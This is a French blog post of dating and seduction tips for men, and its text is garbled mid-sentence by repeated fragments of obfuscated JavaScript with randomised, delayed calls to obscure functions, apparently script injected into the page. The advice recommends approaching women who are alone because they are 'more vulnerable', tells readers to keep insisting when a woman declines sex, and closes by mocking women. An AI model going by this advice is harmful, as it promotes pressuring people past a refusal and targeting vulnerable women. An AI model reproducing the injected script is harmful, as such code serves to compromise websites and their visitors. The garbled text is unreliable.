Draguer, c’est tout un art, aussi vous comprendrez que ce n’est pas naturellement à la portée de tout le monde. Eh oui, on ne peut pas tous être Casanova et emballer toutes les filles avec quelques paroles seulement. Aussi, j’ai décidé aujourd’hui de vous proposer quelques conseils pour vous aider à draguer plus efficacement pour une séance sous la couette assurée en fin de semaine, pourquoi pas le soir même ?
3 choses que vous devez prendre en compte
Avant toute chose, je tiens à vous préciser que tout ce que je vais vous dire, je l’ai puisé de mon expérience personnelle, aussi si ça peut réellement vous aider, c’est top. Donc, je vous conseille de draguer surtout en début de semaine. En effet, le week-end, les filles sont plus crâneuses, elles se prennent pou des divas, surtout en boite. Aussi, n’attendez pas grand-chose de ces numéros obtenus en soirée.
Je vous conseille également de draguer une fille seule plutôt qu’une fille qui passe devant vous en groupe. Simple logique, quand elle est seule elle est plus vulnérable, donc plus susceptible de remarquer votre présence et de faire attention à vous. Essayez de ne pas passer pour un taré en choisissant bien vos premiers mots.
Autre chose, avant de draguer, je pense que vous devez vous assurer, ça ne prend que quelques secondes, que la fille en question vous intéresse réellement, que ce soit un simple plan cul ou pour une histoire plus sérieuse. De plus, c’est fatigant de mentir. Mieux vaut toujours être honnête.
Autres conseils à retenir
Soyez combattif quandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} vous décidez de séduire une fille. Ne capitulez jamais aux premiers obstacles qu’elles vous imposent, mais n’en faites pas trop non plus. En effet, certaines aiment bien tester votre virilité, aussi ne la décevez pas et prenez la peine d’insister si jamais elle ne veut pas coucher le premier soir, ce sera au deuxième rendez-vous.
Ce qu’elle dit sur elle n’a pas d’importance dans le déroulement de votre processus de séduction. En effet, une femme peut dire tout et n’importe quoi sur elle, sans que cela ne soit forcément vrai.
Si vous n’avez pas de point commun, si vous n’avez pas d’intérêt commun, les mêmes goûts ou les mêmes fréquentations, du moment que le courant passe et que vous arrivez à passer du bon temps ensemble, qu’elle semble motivée par vos rencontres, c’est dans la poche !
Les femmes c’est d’un compliqué. Moi au lieu de draguer, je préfère me faire draguer, c’est plus intéressant. Voir ces petites allumeuses vous faire de l’œil c’est très divertissant, c’est encore plus hilarant de voir leur tête quand elles se rendent compte que l’on se fou complètement d’elles.